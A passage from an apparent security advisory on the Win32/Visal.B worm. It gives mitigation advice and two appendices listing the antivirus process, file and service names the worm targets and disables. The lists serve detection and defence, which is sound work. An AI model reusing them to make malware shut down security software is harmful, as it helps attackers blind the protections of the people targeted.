    A technical article describing how to secure WMI (Windows Management Instrumentation) can be found on the Microsoft Developer Network, available at:
    http://msdn.microsoft.com/en-us/library/aa392291%28VS.85%29.aspx

  • Update host and gateway antivirus product signatures.

    Several corporate antivirus engines detect some of the payloads associated with this threat. SecureWorks has provided samples of all related malware files to all major antivirus vendors. If antivirus signatures are not yet available, monitor or contact your antivirus vendor(s) for signature update availability.

  • Think twice before allowing your web browser to remember your passwords for you.

    This worm uses legitimate password recovery and revealer applications as well as a backdoor capable of stealing passwords and digital certificates from web browsers. Malware has proven that default settings for password security in modern web browsers are ineffective. Additional settings, such as setting a master password, are needed to help mitigate this risk. Optionally, users may want to consider using password management programs instead of built-in browser functionality.
 

Appendix A. List of security applications targeted by Win32/Visal.B

00hoeav.com
0w.com
360rpt.ExE
360safe.ExE
360safebox.ExE
360tray.ExE
6.bat
6fnlpetp.exe
6x8be16.cmd
BIOSREad.exe
BdSurvey.exe
CCenter.ExE
CEmRep.ExE
CMain.ExE
CaVCmd.exe
CaVCtx.exe
CaVRep.exe
CaVRid.exe
CaVSCons.ExE
CaVSubmit.ExE
CavEmSrv.ExE
CavMUd.ExE
CavQ.ExE
CavSn.ExE
CavSub.ExE
CavUMaS.ExE
CavUserUpd.ExE
CavaUd.ExE
Cavapp.ExE
Cavmr.ExE
Cavoar.ExE
Cavvl.ExE
EMdISK.exe
FPWin.exe
FPaVServer.exe
FProttray.exe
FRW.ExE
FileKan.exe
FrameworkService.exe
FrzState2k.exe
GFUpd.ExE
GetSI.dll
GuardField.ExE
Hijackthis.ExE
ICLOad95.ExE
ICLOadNt.ExE
ICMON.ExE
ICSUPP95.ExE
ICSUPPNt.ExE
IEShow.exe
IFaCE.ExE
IceSword.ExE
Identity.exe
InstLsp.ExE
InstallCaVS.ExE
Iparmor.ExE
KPfwSvc.ExE
KRegEx.ExE
KVSrvxP.ExE
KVWSC.ExE
KaSaRP.ExE
KaVPFW.ExE
KeyMgr.exe
MSGrc32.vbs
McShield.exe
McVSEscn.exe
Mcdetect.exe
Mctray.exe
Mmsk.ExE
MooLive.exe
NaVW32.ExE
NaVaPW32.ExE
Navapsvc.ExE
OnaccessInstaller.ExE
PFW.ExE
PSHost.exe
PaVSRV51.ExE
Pagent.exe
Pagentwd.exe
PavFnSvr.exe
PavReport.exe
PsCtrlS.exe
PsImSvc.exe
QQdoctor.ExE
QtnMaint.exe
RStray.ExE
RaV.ExE
RaVtRaY.ExE
RavStub.ExE
Ravservice.ExE
Rfwstub.ExE
Runiep.ExE
SCVHOSt.exe
SCVHSOt.exe
SCVVHOSt.exe
SCVVHSOt.exe
SOLOCFG.exe
SOLOLItE.exe
SOLOSCaN.exe
SOLOSENt.exe
SREngLdr.ExE
SendLogs.exe
Socksa.ex
Sphinx.exe
Spybotsd.exe
UPSdbMaker.ExE
UUpd.ExE
UdaterUI.exe
VPC32.ExE
VPtRaY.ExE
VSECOMR.ExE
VSHWIN32.ExE
VSStat.ExE
Vba32ECM.exe
Vba32PP3.exe
Vba32Qtn.exe
Vba32act.exe
Vba32arkit.exe
Vba32ifs.exe
VetMsg.exe
Visthaux.exe
VstskMgr.exe
WEBPROxY.ExE
WEBSCaNx.ExE
WOPtILItIES.ExE
WinGrc32.dll
WrCtrl.exe
Wradmin.exe
_aVP32.ExE
_aVPCC.ExE
_aVPM.ExE
a2cmd.ExE
a2free.ExE
a2service.ExE
a2upd.ExE
aNtIaRP.ExE
aNtS.ExE
aPVxdWIN.ExE
aVCONSOL.ExE
aVENGINE.ExE
aVP32.ExE
aVPCC.ExE
aVPM.ExE
abk.bat
adobe Gamma Loader.exe
algsrvs.exe
algssl.exe
angry.bat
anti-trojan.exe
antihost.exe
apu-0607g.xml
apu.stt
arSwp.ExE
ashEnhcd.exe
ashLogV.exe
ashMaiSv.exe
ashPopWz.exe
ashQuick.exe
ashServ.exe
ashSkPcc.exe
ashUpd.exe
ashWebSv.exe
ashdisp.exe
ast.ExE
aswBoot.exe
aswRegSvr.exe
aswUpdSv.exe
autoRun.ExE
autoRunKiller.ExE
autorun.bin
autorun.ini
autorun.reg
autorun.txt
autorun.wsh
autoruns.exe
autorunsc.exe
avMonitor.ExE
avadmin.exe
avastSS.exe
avcenter.exe
avciman.exe
avconfig.exe
avgamsvr.exe
avgas.exe
avgcc.exe
avgcc32.exe
avgemc.exe
avginet.exe
avgnt.exe
avgrssvc.exe
avgrsx.exe
avgscan.exe
avgscanx.exe
avgserv.exe
avguard.exe
avgupsvc.exe
avgw.exe
avgwdsvc.exe
avltd.exe
avmailc.exe
avnotify.exe
avp.com
avp.exe
avscan.exe
avzkrnl.dll
bad1.exe
bad2.exe
bad3.exe
bdagent.exe
bdsubwiz.exe
blackd.exe
blackice.exe
caiss.exe
caissdt.exe
catcache.dat
cauninst.exe
cavasm.ExE
cavse.ExE
ckahcomm.dll
ckahrule.dll
ckahum.dll
cleaner.exe
cleaner3.exe
clldr.dll
copy.exe
curidsbase.kdz
dF5Serv.exe
destrukto.vbs
diffs.dll
drvins32.exe
drwadins.exe
drweb32w.exe
drweb386.exe
drwebscd.exe
drwebupw.exe
drwebwcl.exe
drwreg.exe
e.cmd
e9ehn1m8.com
edb.chk
egui.exe
ekrn.exe
f0.cmd
flashy.exe
fpscan.exe
fptrayproc.exe
fs6519.dll.vbs
fssf.exe
fssync.dll
fun.xls.exe
g2pfnid.com
guard.exe
guardgui.exe
guardxkickoff.exe
guardxkickoff_x64.exe
guardxservice.exe
guardxup.exe
h3.bat
hookinst.exe
host.exe
i.bat
iSafInst.exe
iSafe.exe
iamapp.exe
iamserv.exe
iefqwp.cmd
ij.bat
kav.bav
kav32.ExE
kavbase.kdl
kavstart.ExE
ker.vbs
killVBS.vbs
kissvc.ExE
kl1.sys
klavemu.kdl
klbg.cat
klbg.sys
klif.cat
klif.sys
klim5.sys
kmailmon.ExE
kwatch.ExE
licmgr.ex
licreg.exe
lky.exe
lockdown2000.exe
m2nl.bat
mbam.exe
mcagent.exe
mcappins.exe
mcaupdate.exe
mcdash.exe
mcinfo.exe
mcinsupd.exe
mcmnhdlr.exe
mcregwiz.exe
mcupdmgr.exe
mcupdui.exe
mcvsftsn.exe
mcvsmap.exe
mghtml.exe
msdos.pif
msfir80.exe
msime80.exe
msizap.exe
msmsgs.exe
msvcm80.dll
msvcp80.dll
msvcr71.dll
msvcr80.dll
mzvkbd.dll
mzvkbd3.dll
naPrdMgr.exe
naiavfin.exe
netcfg.dll
new folder.exe
njibyekk.com
nod32.exe
nod32krn.exe
nod32kui.exe
oasclnt.exe
olb1iimw.bat
pavprsrv.exe
pavsched.exe
pavtest.exe
pctsSvc.exe
pctsauxs.exe
pctstray.exe
preupd.exe
prloader.dll
procexp.exe
psctrlc.exe
pskmssvc.exe
ravmon.exe
rcukd.cmd
reload.exe
rescue32.exe
rescuecd.zip
rfwProxy.ExE
rfwmain.ExE
rfwsrv.ExE
rose.exe
safeboxtray.ExE
sal.xls.exe
sched.exe
scvhosts.exe
scvvhosts.exe
seccenter.exe
session.exe
shstat.exe
spidercpl.exe
spiderml.exe
spidernt.exe
spiderui.exe
spml_set.exe
ssvichosst.exe
sxs.exe
system.exe
tPSrv.exe
tca.exe
temp.exe
temp2.exe
toy.exe
trojandetector.ExE
trojanwall.ExE
trojdie.KxP
uiscan.exe
unp_test.ExE
update.exe
updater.dll
userdump.exe
v.exe
vba32ldr.exe
vbcmserv.exe
vbcons.exe
vbglobal.exe
vbimport.exe
vbinst.exe
vbscan.exe
vbsystry.exe
virusutilities.exe
vsmon.exe
vsserv.exe
whi.com
wscntfy.exe
wsctool.exe
yannh.cmd
ybj8df.exe
zonealarm

Appendix B. List of Services Targeted for Disabling by Win32/Visal.B

Avast! Antivirus
aswUpdSv
avast! Mail Scanner
avast! Web Scanner
AntiVirService
AntiVirMailGuard
AntiVirSchedulerService
AntiVirWebService
AntiVirFirewallService
NIS
MSK80Service
0053591272669638mcinstcleanup
mfefire
McNASvc
Mc0obeSv
McMPFSvc
McProxy
Mc0DS
mcmscsvc
McAfee SiteAdvisor Service
mfevtp
McNaiAnn
McShield
Avgfws9
AVG Security Toolbar Service
avg9wd
AVGIDSAgent
PAVFNSVR
Gwmsrv
PSHost
PSIMSVC
PAVSRV
PavPrSrv
PskSvcRetail
Panda Software Controller
TPSrv
SfCtlCom
TmPlw
TmProxy
TMBMServer
Arrakis3
LIVESRV
scan
VSSERV
sdAuxService
sdCoreService
AVP
